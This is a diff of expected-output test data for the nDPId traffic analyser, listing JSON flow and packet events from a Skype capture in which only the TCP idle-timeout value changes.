-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431970675578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675578,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVJFAAEAGmuXAqAEi1cezr8hHAbtzmW86AAAAALAC\/\/\/ayQAAAgQFtAEDAwUBAQgKPjIl6QAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1431970675640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970675640,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7yEfSVR1Cc5lvO6ASOJBaGQAAAgQFrAQCCApO3xqhPjIl6QEDAwk="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1431970675641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970675641,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n6FAAEAGT+HAqAEi1cezr8hHAbtzmW870lUdQ4AQECyxBQAAAQEICj4yJidO3xqh"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABAxtRAAEAGKUnAqAEinTfrmMhInF05JqawAAAAALAC\/\/9CLwAAAgQFtAEDAwUBAQgKPjInhAAAAAAEAgAA"} 
+00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675578,"flow_last_seen":1431970675578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675578,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431970675578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675578,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVJFAAEAGmuXAqAEi1cezr8hHAbtzmW86AAAAALAC\/\/\/ayQAAAgQFtAEDAwUBAQgKPjIl6QAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1431970675640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970675640,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7yEfSVR1Cc5lvO6ASOJBaGQAAAgQFrAQCCApO3xqhPjIl6QEDAwk="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1431970675641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970675641,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n6FAAEAGT+HAqAEi1cezr8hHAbtzmW870lUdQ4AQECyxBQAAAQEICj4yJidO3xqh"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABAxtRAAEAGKUnAqAEinTfrmMhInF05JqawAAAAALAC\/\/9CLwAAAgQFtAEDAwUBAQgKPjInhAAAAAAEAgAA"} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABB4XAAAEARAafAqAEinTc4kzLdnE4ALQw6e5sCLpawwxGRzNJ9jeoeh5bY+9RpiszLnAcSdcNuRnMOI9PLQQ=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1ktIAAEARBdLAqAEiQTffEjLdnFkAIdOte50CPL9ZRieP6CLGvHSnuteGzwQxXE6Sug=="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1431970676061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970676061,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIpxdyEgRBN2QOSamsaASOJC3pAAAAgQFrAQCCApMXif\/PjInhAEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1431970676061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970676061,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FvZAAEAG2TPAqAEinTfrmMhInF05JqaxEQTdkYAQECwOiwAAAQEICj4yJ8hMXif\/"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1431970676061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970676061,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIpxdyEgRBN2QOSamsaASOJC3pAAAAgQFrAQCCApMXif\/PjInhAEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1431970676061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970676061,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FvZAAEAG2TPAqAEinTfrmMhInF05JqaxEQTdkYAQECwOiwAAAQEICj4yJ8hMXif\/"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2RjwAAEAR6djAqAEinTfroDLdnFYAIpfGe58CtglNf35c9xed\/TOYZPtdg4AQKYWmKBE="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5iSIAAEARWf7AqAEinTc4kjLdnF4AJWUse6ECi+HEJAzVpo3ery\/yzADPEQnmy2088qUgojE="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677603,"flow_last_seen":1431970677603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970677603,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431970677603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970677603,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVVtAAEAGmsLAqAEinTfrmMhKAbuh9dLFAAAAALAC\/\/9BpgAAAgQFtAEDAwUBAQgKPjItyQAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1431970677668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970677668,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIgG7yErORgmHofXSxqASOJDMTwAAAgQFrAQCCApMXimSPjItyQEDAwk="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1431970677668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970677668,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tRpAAEAGOw\/AqAEinTfrmMhKAbuh9dLGzkYJiIAQECwjOgAAAQEICj4yLglMXimS"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677603,"flow_last_seen":1431970677603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970677603,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431970677603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970677603,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVVtAAEAGmsLAqAEinTfrmMhKAbuh9dLFAAAAALAC\/\/9BpgAAAgQFtAEDAwUBAQgKPjItyQAAAAAEAgAA"} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1431970677668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970677668,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIgG7yErORgmHofXSxqASOJDMTwAAAgQFrAQCCApMXimSPjItyQEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1431970677668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970677668,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tRpAAEAGOw\/AqAEinTfrmMhKAbuh9dLGzkYJiIAQECwjOgAAAQEICj4yLglMXimS"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+xqAAAEAR0mLAqAEinTeCqjLdnFIAKv3he6MC3h4IlBBBiQEMzD2u81WGXlCVYngNZSbA0YydRzOnaw=="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -717,27 +717,27 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431970681960,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970681960,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaTkAAEARlaPAqAEib91KKDLdnFkALS1Je7sCEGG8jv3asKVduW1KlINShpl5CYZ6daDh4AHUflFCiwcMag=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7SRAAEAGAv\/AqAEinTfrkshMnFVVB2sVAAAAALAC\/\/9GzAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51277,"dst_port":40026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1214,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5x1AAEAGCPzAqAEinTfrnMhNnFpJkZ45AAAAALAC\/\/8fDgAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1215,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 